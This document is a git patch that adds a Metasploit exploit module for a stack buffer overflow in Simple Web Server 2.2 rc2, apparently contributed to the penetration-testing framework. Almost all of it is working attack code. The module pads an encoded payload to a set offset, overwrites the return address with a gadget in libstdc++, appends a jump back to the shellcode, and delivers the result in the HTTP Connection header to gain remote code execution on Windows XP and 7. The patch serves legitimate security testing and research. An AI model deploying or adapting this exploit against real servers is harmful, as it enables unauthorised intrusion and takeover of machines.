From beb1fbb55d784d041155c1bd71324b4d4c7dfd29 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 21 Jul 2012 12:07:36 +0200 Subject: [PATCH] Added module for Simple Web Server Connection header bof --- .../windows/http/sws_connection_bof.rb | 87 +++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 modules/exploits/windows/http/sws_connection_bof.rb diff --git a/modules/exploits/windows/http/sws_connection_bof.rb b/modules/exploits/windows/http/sws_connection_bof.rb new file mode 100644 index 0000000000..240a89b23a --- /dev/null +++ b/modules/exploits/windows/http/sws_connection_bof.rb @@ -0,0 +1,87 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] } + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Simple Web Server Connection Header Buffer Overflow", + 'Description' => %q{ + This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user + can send a long string data in the Connection Header to causes an overflow on the + stack when function vsprintf() is used, and gain arbitrary code execution. The + module has been tested successfully on Windows 7 SP1 and Windows XP SP3. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr.pr0n', # Vulnerability Discovery and PoC + 'juan' # Metasploit module + ], + 'References' => + [ + ['EDB', '19937'], + ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/'] + ], + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d", + 'Space' => 2048, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000 + }, + 'DefaultOptions' => + { + 'EXITFUNC' => "process", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1', + { + 'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll + 'Offset' => 2048, + 'OffsetEDI' => 84 + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jul 20 2012", + 'DefaultTarget' => 0)) + end + + def exploit + + sploit = payload.encoded + sploit << rand_text(target['Offset'] - sploit.length) + sploit << [target.ret].pack("V") # eip + sploit << rand_text(target['OffsetEDI']) + sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string + + print_status("Trying target #{target.name}...") + + connect + + send_request_cgi({ + 'uri' => '/', + 'version' => '1.1', + 'method' => 'GET', + 'connection' => sploit + }) + + disconnect + + end +end